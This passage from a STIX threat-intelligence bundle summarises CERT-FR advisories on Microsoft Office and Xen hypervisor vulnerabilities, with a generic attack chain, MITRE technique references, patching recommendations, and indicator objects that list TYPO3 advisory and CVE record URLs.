deployment of ransomware or other destructive malware. While the advisory does not specify the number of victims or targeted sectors, the broad impact across common Microsoft Office products means that organizations of all sizes and industries are potentially at risk. The combination of remote code execution, privilege escalation, and data confidentiality compromise could lead to significant financial losses, reputational damage, and regulatory penalties.\n\n## Recommendation\n\n*   Patch CVE-2026-44803, CVE-2026-44812, CVE-2026-44817, CVE-2026-44818, CVE-2026-44819, CVE-2026-44820, CVE-2026-44821, CVE-2026-44822, CVE-2026-44823, CVE-2026-44824, CVE-2026-45455, CVE-2026-45456, CVE-2026-45457, CVE-2026-45458, CVE-2026-45459, CVE-2026-45460, CVE-2026-45461, CVE-2026-45463, CVE-2026-45466, CVE-2026-45469, CVE-2026-45471, CVE-2026-45472, CVE-2026-45474, CVE-2026-45475, CVE-2026-45485, CVE-2026-45486, CVE-2026-45643, CVE-2026-45645, CVE-2026-45649, CVE-2026-47293, and CVE-2026-47635 by applying the latest security updates from Microsoft for all affected Office products and versions immediately.\n*   Deploy the \"Detect Suspicious Child Process by Microsoft Office Application\" Sigma rule to detect post-exploitation activity from Office applications.\n*   Deploy the \"Detect Outbound Network Connection from Microsoft Office Application\" Sigma rule to monitor for unusual C2 communications.\n*   Ensure Sysmon process creation (Event ID 1), network connection (Event ID 3), and file creation (Event ID 11) logging is enabled on all Windows endpoints to generate the necessary telemetry for the detection rules in this brief.\n",
      "published": "2026-06-14T09:15:49Z",
      "labels": [
        "vulnerability",
        "microsoft-office",
        "remote-code-execution",
        "privilege-escalation",
        "data-confidentiality",
        "windows",
        "macos",
        "android"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0727/"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44803"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44812"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44817"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44818"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44819"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44820"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44821"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44822"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44823"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44824"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45455"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45456"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45457"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45458"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45459"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45460"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45461"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45463"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45466"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45469"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45471"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45472"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45474"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45475"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45485"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45486"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45643"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45645"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45649"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47293"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47635"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44803"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44812"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44817"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44818"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44819"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44820"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44821"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44822"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44823"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44824"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45455"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45456"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45457"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45458"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45459"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45460"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45461"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45463"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45466"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45469"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45471"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45472"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45474"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45475"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45485"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45486"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45643"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45645"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45649"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47293"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47635"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da7518dc-e522-50e3-a6f5-8b5fe10a508d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--055689dd-d0e4-5bb1-9f4e-364bb8e2e041",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ef4f53b-e9f9-520a-8c61-0f985d654af1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--055689dd-d0e4-5bb1-9f4e-364bb8e2e041",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e1b5e6d-aad4-5ced-9d75-be8943023110",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--055689dd-d0e4-5bb1-9f4e-364bb8e2e041",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--055689dd-d0e4-5bb1-9f4e-364bb8e2e041",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Xen Hypervisor Vulnerabilities Leading to Privilege Escalation, DoS, and Data Confidentiality Compromise",
      "description": "## Overview\n\nOn June 10, 2026, CERT-FR published an advisory detailing multiple critical vulnerabilities within the Xen hypervisor platform. These flaws, identified as CVE-2025-10263, CVE-2026-42487, CVE-2026-42488, CVE-2026-42489, and CVE-2026-42490, affect all versions of Xen that have not applied the latest security patches released on June 09, 2026. Successful exploitation of these vulnerabilities could grant an attacker significant control over the hypervisor host and its hosted virtual machines. The impacts range from elevation of privileges, allowing an attacker to break out of a guest VM, to remote denial of service, disrupting service availability, and compromise of data confidentiality, enabling unauthorized access to sensitive information across the virtualized environment. These vulnerabilities pose a severe risk to organizations leveraging Xen for virtualization, necessitating immediate patching.\n\n## Attack Chain\n\n1.  **Initial Access to Guest VM**: An attacker first gains control over a guest virtual machine running on the vulnerable Xen hypervisor. This initial access could be achieved through various methods such as exploiting a vulnerability within an application running on the guest, spearphishing, or weak credentials.\n2.  **Exploitation Preparation within VM**: Malicious code is executed within the compromised guest VM, preparing the environment or triggering specific hypercalls designed to interact with or exploit flaws in the Xen hypervisor.\n3.  **Guest Escape \u0026 Privilege Escalation (CVE-2025-10263, CVE-2026-42487)**: The attacker leverages a specific Xen vulnerability (e.g., a flaw in hypercall handling, device emulation, or shared memory management) to bypass the guest VM's isolation and execute code with elevated privileges on the underlying Xen hypervisor host.\n4.  **Hypervisor Control**: With escalated privileges on the Xen host, the attacker gains full control over the hypervisor itself, enabling them to manipulate or compromise all other guest VMs, the host operating system, and potentially the entire virtualized infrastructure.\n5.  **Denial of Service (CVE-2026-42488)**: The attacker triggers the remote denial of service vulnerability, causing the Xen hypervisor host or specific guest VMs to become unresponsive, crash, or reboot unexpectedly, leading to service disruption and unavailability.\n6.  **Data Confidentiality Compromise \u0026 Exfiltration (CVE-2026-42489, CVE-2026-42490)**: The attacker utilizes other vulnerabilities to access sensitive data from the hypervisor's memory, other isolated guest VMs, or connected storage. This data is then staged and exfiltrated from the Xen host to an external command and control server.\n\n## Impact\n\nThe impact of these Xen vulnerabilities is critical for any organization utilizing the affected hypervisor. Successful exploitation can lead to a complete compromise of the virtualized environment. This includes unauthorized access to all virtual machines, the hypervisor itself, and any data residing within or accessible by them. The potential for a remote denial of service could result in significant operational downtime, severe business disruption, and financial losses duepec. Data confidentiality breaches could expose sensitive corporate information, customer data, or intellectual property, leading to regulatory fines, reputational damage, and loss of trust. The scope of targeting is broad, affecting any organization with unpatched Xen installations.\n\n## Recommendation\n\n*   Prioritize applying all available security patches for Xen as detailed in the vendor advisories referenced in this brief. Specifically, apply the patches for xsa/advisory-491, xsa/advisory-492, xsa/advisory-493, and xsa/advisory-494 immediately.\n*   Deploy the Sigma rules provided in this brief to your SIEM and tune them for your environment to detect post-exploitation activity on Xen hypervisor hosts.\n*   Enable comprehensive `process_creation` and `network_connection` logging on all Xen hypervisor hosts (typically Linux systems) to facilitate detection of suspicious activity like unexpected binaries executing with root privileges or unusual outbound connections.\n*   Review and monitor for unexpected `reboot` or `shutdown` commands or system logs indicating kernel panics/crashes on Xen hypervisor hosts, which may signal exploitation of CVE-2026-42488.\n",
      "published": "2026-06-14T09:17:03Z",
      "labels": [
        "virtualization",
        "hypervisor",
        "xen",
        "vulnerability",
        "privilege-escalation",
        "denial-of-service",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0721/"
        },
        {
          "source_name": "reference",
          "url": "https://xenbits.xen.org/xsa/advisory-491.html"
        },
        {
          "source_name": "reference",
          "url": "https://xenbits.xen.org/xsa/advisory-492.html"
        },
        {
          "source_name": "reference",
          "url": "https://xenbits.xen.org/xsa/advisory-493.html"
        },
        {
          "source_name": "reference",
          "url": "https://xenbits.xen.org/xsa/advisory-494.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-10263"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42487"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42488"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42489"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42490"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--97aca8b1-c4d4-5fcf-a969-aa26da7517bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-2j54-93q2-3hjq",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-2j54-93q2-3hjq']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--335bfb01-d915-59df-9c2a-391d43b5f18b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--97aca8b1-c4d4-5fcf-a969-aa26da7517bb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--45244b69-5f39-5799-b8a4-9d33c1c6bcfd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-c78m-c52x-jgwp",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-c78m-c52x-jgwp']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--68e130e2-a206-5887-9923-7cd869050fb4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--45244b69-5f39-5799-b8a4-9d33c1c6bcfd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--90d12407-c165-57bb-93a0-a8eb4d24159d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-cg75-qfg2-w9hj",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-cg75-qfg2-w9hj']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4dedc2f2-7adc-52ab-8117-4e059e9b321c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--90d12407-c165-57bb-93a0-a8eb4d24159d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3ced54bc-e0f6-500e-acc3-b3351d2df72b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-chm7-4vch-h8vr",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-chm7-4vch-h8vr']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cd465d1e-dcc7-5a91-ae4a-272ce62b41c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--3ced54bc-e0f6-500e-acc3-b3351d2df72b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6c196ec0-a9b5-5fcb-bc43-d2a242e6b7c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-f34x-rx2w-7pm3",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-f34x-rx2w-7pm3']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0575e309-c958-58b7-84f0-156fd0b74c94",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--6c196ec0-a9b5-5fcb-bc43-d2a242e6b7c9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a01c8eea-8361-5a8d-801d-226f5d8a514f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-jf56-v8jc-jcc5",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-jf56-v8jc-jcc5']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ef756597-7513-5b45-bfbb-2a60a8e4d36d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--a01c8eea-8361-5a8d-801d-226f5d8a514f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6db99c6a-8f76-5781-b55f-d10ec9d99d30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-jh32-v29g-68pq",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-jh32-v29g-68pq']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--efc7d39d-b55f-5159-bb9a-5af9831fb6cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--6db99c6a-8f76-5781-b55f-d10ec9d99d30"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7cda7314-2d04-59c4-89aa-5ed9d8a596f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-pjpj-v387-x4vq",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-pjpj-v387-x4vq']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aa6108f3-c17d-540a-b91c-349d7cc40f69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--7cda7314-2d04-59c4-89aa-5ed9d8a596f3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0cd02de9-c40a-56bc-acf0-8aaf0f0c944d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-q93m-25xv-94hh",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-q93m-25xv-94hh']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3939cc91-b696-52aa-99a3-3947de61554a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--0cd02de9-c40a-56bc-acf0-8aaf0f0c944d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ddda7fd0-1e12-5240-9eb5-5036dbb524df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/TYPO3/typo3/security/advisories/GHSA-qcmw-6rm2-5x78",
      "pattern": "[url:value = 'https://github.com/TYPO3/typo3/security/advisories/GHSA-qcmw-6rm2-5x78']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f75395b6-11c9-5e2d-aa28-f3137bcc77ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--ddda7fd0-1e12-5240-9eb5-5036dbb524df"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5c53cacd-9d2c-5c27-b63b-57b22b57f600",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-11607",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-11607']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c9fc1fe7-8c87-5858-9ff1-097d21cd09da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--5c53cacd-9d2c-5c27-b63b-57b22b57f600"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2d5acccb-adf8-5789-a660-50ad62a10c9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-47348",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-47348']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9daa1efd-017e-546e-907a-20446955d5b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--2d5acccb-adf8-5789-a660-50ad62a10c9c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--efbec62e-79af-5a5c-9b93-dcd3ae8ce1f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-47349",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-47349']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48bd54b0-b0da-5460-b987-76941d0b8501",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--efbec62e-79af-5a5c-9b93-dcd3ae8ce1f8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a8d04e8e-2cf9-595b-814f-a7da01c00720",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-47350",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-47350']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53cc6c98-0687-5dc5-9d8b-30530c05b8d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--a8d04e8e-2cf9-595b-814f-a7da01c00720"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ba490615-1d79-5d88-91fe-7c309d87dc2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-47351",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-47351']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--977c1041-f7ed-50ff-a824-4649d9117aea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--ba490615-1d79-5d88-91fe-7c309d87dc2d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d6072495-fa29-5d7f-b145-6b8afc304933",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-47352",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-47352']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e16f1342-c24f-5f7f-8ce5-70c78c889a13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
